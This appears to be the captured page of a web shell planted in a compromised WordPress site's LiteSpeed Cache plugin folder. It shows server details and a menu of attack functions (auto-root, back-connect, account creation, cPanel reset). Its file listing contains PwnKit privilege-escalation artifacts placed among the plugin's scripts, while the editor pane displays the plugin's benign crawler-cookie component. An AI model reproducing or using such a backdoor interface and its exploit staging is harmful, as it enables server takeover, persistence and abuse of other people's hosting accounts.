Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.225.56.222
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
litespeed-cache /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
babel.min.js
772.69
KB
-rw-r--r--
component.cdn.js
6.34
KB
-rw-r--r--
component.crawler.js
2.93
KB
-rw-r--r--
css_async.js
1.45
KB
-rw-r--r--
css_async.min.js
1.32
KB
-rw-r--r--
guest.docref.js
247
B
-rw-r--r--
guest.docref.min.js
215
B
-rw-r--r--
guest.js
740
B
-rw-r--r--
guest.min.js
373
B
-rw-r--r--
instant_click.min.js
4.52
KB
-rw-r--r--
instant_click.ori.js
16.31
KB
-rw-r--r--
iziModal.min.js
25.65
KB
-rw-r--r--
js_delay.js
2.67
KB
-rw-r--r--
js_delay.min.js
1.65
KB
-rw-r--r--
lazyload.init.js
823
B
-rw-r--r--
lazyload.lib.js
24.89
KB
-rw-r--r--
lazyload.min.js
8.12
KB
-rw-r--r--
litespeed-cache-admin.js
16.44
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
react.min.js
128.93
KB
-rw-r--r--
webfontloader.js
12.21
KB
-rw-r--r--
webfontloader.min.js
11.81
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : component.crawler.js
/** * Crawler simulation module * @author Hai Zheng */ class CrawlerSimulate extends React.Component { constructor(props) { super(props); this.state = { list: props.list, }; this.handleInputChange = this.handleInputChange.bind(this); this.delRow = this.delRow.bind(this); this.addNew = this.addNew.bind(this); } handleInputChange(e, index) { const target = e.target; const value = target.type === 'checkbox' ? target.checked : target.value; const list = this.state.list; list[index][target.dataset.type] = value; this.setState({ list: list, }); } delRow(index) { const data = this.state.list; data.splice(index, 1); this.setState({ list: data }); } addNew() { const list = this.state.list; list.push({ name: '', vals: '' }); this.setState({ list: list }); } render() { return ( <React.Fragment> {this.state.list.map((item, i) => ( <SimulationBlock item={item} key={i} index={i} handleInputChange={this.handleInputChange} delRow={this.delRow} /> ))} <p> <button type="button" className="button button-link litespeed-form-action litespeed-link-with-icon" onClick={this.addNew}> <span className="dashicons dashicons-plus-alt"></span> {litespeed_data['lang']['add_cookie_simulation_row']} </button> </p> </React.Fragment> ); } } // { name: '', vals: '' } class SimulationBlock extends React.Component { constructor(props) { super(props); this.handleInputChange = this.handleInputChange.bind(this); this.delRow = this.delRow.bind(this); } handleInputChange(e) { this.props.handleInputChange(e, this.props.index); } delRow() { this.props.delRow(this.props.index); } render() { const item = this.props.item; return ( <div className="litespeed-block"> <div className="litespeed-col-auto"> <label className="litespeed-form-label">{litespeed_data['lang']['cookie_name']}</label> <input type="text" name={litespeed_data['ids']['crawler_cookies'] + '[name][]'} className="regular-text" value={item.name} data-type="name" onChange={this.handleInputChange} /> </div> <div className="litespeed-col-auto"> <label className="litespeed-form-label">{litespeed_data['lang']['cookie_values']}</label> <textarea rows="5" cols="40" name={litespeed_data['ids']['crawler_cookies'] + '[vals][]'} placeholder={litespeed_data['lang']['one_per_line']} value={Array.isArray(item.vals) ? item.vals.join('\n') : item.vals} data-type="vals" onChange={this.handleInputChange} /> </div> <div className="litespeed-col-auto"> <button type="button" className="button button-link litespeed-collection-button litespeed-danger" onClick={this.delRow}> <span className="dashicons dashicons-dismiss"></span> <span className="screen-reader-text">{litespeed_data['lang']['remove_cookie_simulation']}</span> </button> </div> </div> ); } }
Close